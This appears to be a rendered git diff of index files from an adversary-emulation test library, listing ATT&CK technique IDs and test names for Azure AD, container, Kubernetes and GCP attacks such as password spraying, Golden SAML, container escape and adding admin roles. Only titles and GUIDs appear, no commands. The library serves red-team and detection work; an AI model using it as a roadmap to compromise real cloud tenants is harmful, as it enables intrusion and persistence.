privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
privilege-escalation,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
privilege-escalation,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
privilege-escalation,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
3 credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
4 credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
5 credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
6 defense-impairment T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
7 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
8 privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
9 privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
10 privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
11 privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
12 privilege-escalation T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
13 privilege-escalation T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
14 privilege-escalation T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
15 persistence T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
16 persistence T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
17 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
18 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
19 persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
20 persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
21 persistence T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
22 persistence T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
23 persistence T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
@@ -1,20 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
discovery,T1613,Container and Resource Discovery,1,Docker Container and Resource Discovery,ea2255df-d781-493b-9693-ac328f9afc3f,sh
discovery,T1613,Container and Resource Discovery,2,Podman Container and Resource Discovery,fc631702-3f03-4f2b-8d8a-6b3d055580a1,sh
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1611,Escape to Host,3,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,sh
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
stealth,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 discovery T1613 Container and Resource Discovery 1 Docker Container and Resource Discovery ea2255df-d781-493b-9693-ac328f9afc3f sh
3 discovery T1613 Container and Resource Discovery 2 Podman Container and Resource Discovery fc631702-3f03-4f2b-8d8a-6b3d055580a1 sh
4 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
5 credential-access T1552.007 Kubernetes List Secrets 1 List All Secrets 31e794c4-48fd-4a76-aca4-6587c155bc11 bash
6 credential-access T1552.007 Kubernetes List Secrets 2 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
7 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
8 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
9 persistence T1136.001 Create Account: Local Account 10 Create a Linux user via kubectl in a Pod d9efa6c7-6518-42b2-809a-4f2a8e242b9b bash
10 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
11 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
12 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
13 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
14 privilege-escalation T1611 Escape to Host 3 Privilege Escalation via Docker Volume Mapping 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4 sh
15 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
16 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
17 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
18 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
19 execution T1609 Kubernetes Exec Into Container 2 Docker Exec Into Container 900e2c49-221b-42ec-ae3c-4717e41e6219 bash
20 stealth T1612 Build Image on Host 1 Build Image On Host 2db30061-589d-409b-b125-7b473944f9b3 sh
@@ -1 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
@@ -1,5 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
stealth,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
3 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
4 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
5 stealth T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh

Some files were not shown because too many files have changed in this diff Show More